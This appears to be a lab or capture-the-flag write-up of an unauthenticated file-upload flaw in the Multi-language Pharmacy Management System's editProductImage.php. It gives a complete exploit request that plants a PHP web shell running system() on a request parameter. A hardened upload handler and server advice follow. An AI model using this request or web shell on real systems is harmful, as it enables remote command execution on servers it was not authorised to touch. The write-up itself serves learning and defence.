Vulnerability description: Multi-language Pharmacy Management System (MPMS) is developed in PHP and MySQL. The main purpose of the software is to provide an interface between a pharmacy and its customers, the customers being the software's main users. It helps build an integrated database for the pharmacy business and produces various reports based on parameters such as expiry, product, and so on. In this CMS, php_action/editProductImage.php has an arbitrary file upload vulnerability, which in turn leads to arbitrary code execution.
Exploit reference: https://packetstormsecurity.com/files/166786/Pharmacy-Management-System-1.0-Shell-Upload.html
Started the container and got a login page. Tried to log in, but there was no account, and I was stuck here for quite a while. Visiting /php_action/editProductImage.php
returned "localhost refused the request"; I thought it could only be used after logging in, but in fact that is not needed: just access it directly, capture the request and write the shell in.
The request is as follows:
```http
POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: eci-2zea7obo5nr8fk1t72p4.cloudeci1.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=0eb1aac78dc3ba42607ab8cf31c270ec25c7b37d; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1663293722,1664166096,1665551946,1665735159; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1665735163; PHPSESSID=e63668ifbfptj7h0nsu0odo64t
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 556

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php if($_REQUEST['s']) { system($_REQUEST['s']); } else phpinfo(); ?> </pre> </body> </html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--
```
The response is Image uploaded successfully{"success":true,"messages":"Successfully Updated"}.
Then at /assets/myimages/shell.php?s=
pass the s parameter to execute arbitrary code.
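The root cause is that the handler accepts any client-supplied filename from an unauthenticated request and writes the file, unchanged, into a web-served directory. For comparison, here is a hardened handler for the same `productImage` field, written as an added example (not MPMS's own code); the session flag `$_SESSION['userId']`, the function name `saveProductImage` and the upload directory path are assumptions.

```php
<?php
// Added example (not MPMS's own code): a hardened replacement for an image
// upload handler such as php_action/editProductImage.php. The session flag
// $_SESSION['userId'] and the upload directory are assumed for illustration.
declare(strict_types=1);
session_start();

function saveProductImage(array $file, string $uploadDir): string
{
    // 1. The vulnerable endpoint served unauthenticated requests; require a login.
    if (empty($_SESSION['userId'])) {
        throw new RuntimeException('authentication required');
    }
    // 2. Only accept a file that really arrived through this request's upload.
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])
        || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('invalid upload');
    }
    // 3. Allowlist the extension; never trust the client-supplied Content-Type.
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // 4. Check the real MIME type from the bytes and that the file decodes as an image.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    if ($mime !== $allowed[$ext] || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('file content is not the declared image type');
    }
    // 5. Discard the client filename (e.g. shell.php) and store under a random name.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Usage: "productImage" is the form field name seen in the captured request.
if (isset($_FILES['productImage'])) {
    try {
        $stored = saveProductImage($_FILES['productImage'], __DIR__ . '/../assets/myimages');
        echo json_encode(['success' => true, 'image' => $stored]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['success' => false, 'messages' => $e->getMessage()]);
    }
}
```

Pair this with a web server rule that refuses to execute scripts under the upload directory, so that a file which slips through validation is still served as static content rather than run as PHP.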